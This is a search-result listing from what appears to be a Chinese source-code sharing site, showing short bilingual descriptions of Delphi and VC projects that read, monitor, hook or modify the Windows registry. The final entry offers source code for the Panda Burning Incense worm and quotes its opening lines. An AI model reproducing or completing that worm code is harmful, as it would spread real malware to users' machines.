搜索资源列表
MyIME2拼音输入法
- 大家知道,DELPHI许多控件有IME属性。这么好用的东西VC可没自带,怎么办呢?其实,可通过注册表,用API实现。下面说一下本人对IME的研究结果,并提供示例工程供大家参考: [代码性质] VC可重用代码段 [文件大小] 10K -we all know, many controls are DELPHI IME attributes. So handy things VC may not own, how do? In fact, through the registry, using AP
注册表清理
- 此为用Delphi作的关于注册表清理的小程序,可以参考哟。-this as Delphi on the registry for the clean-up of small procedures, they can refer yo.
RegistryMonitor
- 一个简单的注册表监视程序,用Delphi开发。-A simple registry monitoring program, developed with Delphi.
RegeditTool
- delphi代码操纵windows注册表,内有详细注释,一看就能明白-delphi code to manipulate windows registry, there are detailed notes, a look will be able to understand
388_registry_Hook
- 注册表监控 hook注册表 学习hook用的 -Registry monitor hook with hook registry study of
RegistryMonitor
- 用DELPHI语言实现的可以对系统注册表进行监视的小程序-DELPHI language used can achieve the system registry to conduct surveillance of small programs
USB
- 禁用USB优盘工具,禁用注册表操作,禁用组策略操作,禁用USB优盘写入 -Disable USB Flash Disk tool, disable the registry operation, disable the Group Policy operation, disable the USB Flash Disk write
delphi
- delphi注册表浏览器源码 能够读写注册表信息-delphi registry browser to read and write registry information source
USBcontrol
- 关于delphi的一个小程序,通过修改注册表来禁用/启用USB,-On a small delphi procedures, by modifying the registry to disable/enable USB,
myregedit
- 主要包括:一个windows注册表文件格式的说明文档和一个通过直接读写硬盘操作注册表文件的delphi源码程序,适合底层编程的高级程序员。-These mainly include: a windows registry file format documentation, and a hard disk read and write operations through a direct registry file delphi source program, suitable for low
virus
- 熊猫烧香原代码 熊猫烧香, 十六进制, Windows, 源代码, 字符串 熊猫烧香源代码 program Japussy uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry} const HeaderSize = 82432 //病毒体的大小 IconOffset = EB8 //PE文件主图标的偏移量 //在我的Delphi5 SP1